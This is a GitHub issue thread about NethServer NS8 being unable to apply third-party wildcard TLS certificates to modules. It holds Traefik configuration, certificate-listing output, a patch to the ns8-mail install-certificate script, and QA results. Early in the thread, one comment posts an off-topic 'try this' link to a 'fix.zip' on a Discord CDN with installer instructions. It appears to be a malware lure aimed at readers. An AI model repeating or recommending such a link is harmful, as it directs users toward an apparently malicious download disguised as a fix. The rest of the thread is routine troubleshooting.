### ISSUE TITLE
Wildcard custom certificates cannot be used for modules configuration

### ISSUE THREAD

**Issue by nrauso** [NethServer/dev#7004]
It is not possible to use a third-party wildcard SSL certificate provided by an external authority for configuring modules in NS8. When you upload a third-party certificate, the UI automatically detects the FQDNs included in it. In the case of a wildcard certificate, this means that all FQDNs in the DNS namespace (e.g., *.mydomain.org) are recognized:
![third_party_cert01](https://github.com/user-attachments/assets/bcd781f5-46d6-4a3d-b6d3-f833b3cb312d)

However, this "special name" cannot be applied to any of the modules you install on an NS8 node, and the TLS certificates UI does not offer a way to manage this configuration.
Additionally, the settings page for any NS8 module includes an option to manage an LE certificate but does not allow the management of third-party certificates:
![third_party_cert02](https://github.com/user-attachments/assets/feae0016-5903-4f26-9486-b1894cea2c45)

In conclusion, there is no way to manage a third-party wildcard SSL certificate within NS8. (And as far as I know, 99% of third-party certificates purchased from external authorities are wildcard certificates!)

At the moment, the workaround is to manually insert the necessary DNS names along with the private key and certificate from the external authority into the redis database.

**Components**

`core:2.9.1`
`traefik:2.2.3`

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Amygos** [comment]
Uploading a custom wildcard certificate prevents all subdomains from obtaining Let's Encrypt (LE) certificates.

Example:

```
[root@server ~]# cat  /home/traefik1/.config/state/configs/certificate-example.domain.com.yml 
http:
  routers:
    certificate-example.domain.com:
      entrypoints: https
      service: ping@internal
      rule: Host(`example.domain.com`) && Path(`//8b38cb85-451a-4795-a706-4b544d9cfd36`)
      priority: '1'
      tls:
        domains:
        - main: example.domain.com
        certresolver: acmeServer
```

Running the command to list certificates with `api-cli` shows that the `example.domain.com` subdomain fails to obtain its certificate, while others succeed:

```
[root@server ~]# api-cli run module/traefik1/list-certificates -d '{"expand_list":true}' | jq
Warning: using user "cluster" credentials from the environment
[
  {
    "fqdn": "mail.service.domain.com",
    "type": "internal",
    "obtained": true
  },
  {
    "fqdn": "example.domain.com",
    "type": "internal",
    "obtained": false
  },
  ...
  {
    "fqdn": "*.domain.com",
    "type": "custom",
    "obtained": true
  }
]
```

Testing port `443` returns the wildcard certificate instead of obtaining an LE certificate:

```
[user@local ~]$ curl -v https://example.domain.com
...
* Server certificate:
*  subject: CN=*.domain.com
*  start date: May 21 00:00:00 2024 GMT
*  expire date: Jan 31 23:59:59 2025 GMT
*  subjectAltName: host "example.domain.com" matched cert's "*.domain.com"
```

**Problem:**
- Traefik doesn't request an LE certificate for subdomains if a wildcard certificate is installed.
- `acme.json` is not updated, and the event of obtaining a certificate is never triggered.
- If a module does not use port `443`, it cannot acquire the certificate automatically.

**Comment by scblakely** [comment]
Modifying 

**ns8-mail/imageroot/bin/install-certificate** 

as follows allows a wildcard certificate to be installed into ns8-mail:

Replace

`redis-exec HGET "module/${mtraefik}/certificate/${MAIL_HOSTNAME}" key | base64 -d > server.key
redis-exec HGET "module/${mtraefik}/certificate/${MAIL_HOSTNAME}" cert | base64 -d > server.pem

if [[ $(head -c 5 server.key) != '-----' || $(head -c 5 server.pem) != '-----' ]]; then
    echo "[WARNING] ${service_image} certificate for ${MAIL_HOSTNAME} not found" 1>&2
    exit 2
fi`

with the following code:

`# In the first instance, look for a wildcard domain certificate

domain=`echo ${MAIL_HOSTNAME} | sed -n 's/[^.]*\.//p'`
wildcard="*.${domain}"

redis-exec HGET "module/${mtraefik}/certificate/${wildcard}" key | base64 -d > server.key
redis-exec HGET "module/${mtraefik}/certificate/${wildcard}" cert | base64 -d > server.pem
if [[ $(head -c 5 server.key) != '-----' || $(head -c 5 server.pem) != '-----' ]]; then
    # look for the MAIL_HOSTNAME certificate
    echo "[INFO] ${service_image} wildcard certificate for ${domain} not found" 1>&2
    redis-exec HGET "module/${mtraefik}/certificate/${MAIL_HOSTNAME}" key | base64 -d > server.key
    redis-exec HGET "module/${mtraefik}/certificate/${MAIL_HOSTNAME}" cert | base64 -d > server.pem
fi

# Do we have a valid certificate to install?
if [[ $(head -c 5 server.key) != '-----' || $(head -c 5 server.pem) != '-----' ]]; then
    echo "[WARNING] ${service_image} certificate for ${MAIL_HOSTNAME} not found" 1>&2
    exit 2
fi`

This checks for a wildcard certificate to install and installs it before looking for the $MAIL_HOSTNAME certificate.

**Comment by nrauso** [comment]
test case 1: **VERIFIED**
test case 2: **VERIFIED**
test case 3: **VERIFIED**
test case 4: **VERIFIED**

**Comment by stephdl** [comment]
QA ejabberd

tested version  `ghcr.io/nethserver/ejabberd:1.0.11-dev.1`

- update
The upgrade from ejabberd:1.0.10 to ejabberd:1.0.11-dev.1 is good, the service is up and working after the upgrade

- first install
the service is up and workable after the first configuration

Important Note

Now the certificate comes from traefik, it is a self certificate with a CN which does not match the hostname set inside Ejabberd. Some XMPP clients could complains and refuse to connect

- GAJIM refuses to connect
- PIDGIM OK
- WEBTOP OK

![Image](https://github.com/user-attachments/assets/dc3fca81-4e75-422a-9cb9-4e411122d6e0)
![Image](https://github.com/user-attachments/assets/4d194e12-91c5-466c-9c7d-77e1dc66703c)

what to do 
- go to a let's encrypt certificate in the setting of ejabberd
- upload a certificate in cluster admin that match the CN of the hostname you are using in ejabberd
